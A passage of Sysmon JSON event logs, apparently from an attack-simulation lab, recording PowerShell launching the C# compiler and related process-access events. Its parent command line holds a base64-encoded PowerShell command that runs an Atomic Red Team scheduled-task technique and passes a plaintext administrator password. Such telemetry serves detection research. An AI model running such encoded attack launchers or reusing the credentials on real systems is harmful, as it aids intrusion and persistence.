06:55:18.588","ProcessGuid":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\pgch3ubf\\pgch3ubf.cmdline","CreationUtcTime":"2020-08-01 06:55:18.588","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5647,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.600\r\nProcessGuid: {E2A3D6B1-11D6-5F25-0000-00101A500800}\r\nProcessId: 4968\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\pgch3ubf\\pgch3ubf.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nParentProcessId: 4848\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgAkAG0AeQBBAHIAZwBzACAAPQAgAEAAewAgACIAdQBzAGUAcgBfAG4AYQBtAGUAIgAgAD0AIAAiAEEAVABUAEEAQwBLAFIAQQBOAEcARQBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgA7ACAAIgBwAGEAcwBzAHcAbwByAGQAIgAgAD0AIAAiAEkALQBsADEAawBlAC0AQQB0AHQAYQBjAGsALQBSAGEAbgBnAGUAIQAiACAAfQAKAEkAbgB2AG8AawBlAC0AQQB0AG8AbQBpAGMAVABlAHMAdAAgACIAVAAxADAANQAzAC4AMAAwADUAIgAgAC0ASQBuAHAAdQB0AEEAcgBnAHMAIAAkAG0AeQBBAHIAZwBzACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.600","ProcessGuid":"{E2A3D6B1-11D6-5F25-0000-00101A500800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\pgch3ubf\\pgch3ubf.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","ParentProcessId":"4848","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgAkAG0AeQBBAHIAZwBzACAAPQAgAEAAewAgACIAdQBzAGUAcgBfAG4AYQBtAGUAIgAgAD0AIAAiAEEAVABUAEEAQwBLAFIAQQBOAEcARQBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgA7ACAAIgBwAGEAcwBzAHcAbwByAGQAIgAgAD0AIAAiAEkALQBsADEAawBlAC0AQQB0AHQAYQBjAGsALQBSAGEAbgBnAGUAIQAiACAAfQAKAEkAbgB2AG8AawBlAC0AQQB0AG8AbQBpAGMAVABlAHMAdAAgACIAVAAxADAANQAzAC4AMAAwADUAIgAgAC0ASQBuAHAAdQB0AEEAcgBnAHMAIAAkAG0AeQBBAHIAZwBzACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5648,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.588\r\nSourceProcessGUID: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nSourceProcessId: 4848\r\nSourceThreadId: 1100\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D6-5F25-0000-00101A500800}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978881e3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+983150a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97824823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97882cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978661e8(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.588","SourceProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","SourceProcessId":"4848","SourceThreadId":"1100","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00101A500800}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978881e3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+983150a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97824823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97882cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978661e8(wow64)","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5649,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.588\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D6-5F25-0000-00101A500800}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.588","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00101A500800}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5650,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.588\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.588","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5651,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.588\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.588","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5652,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.588\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.588","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dl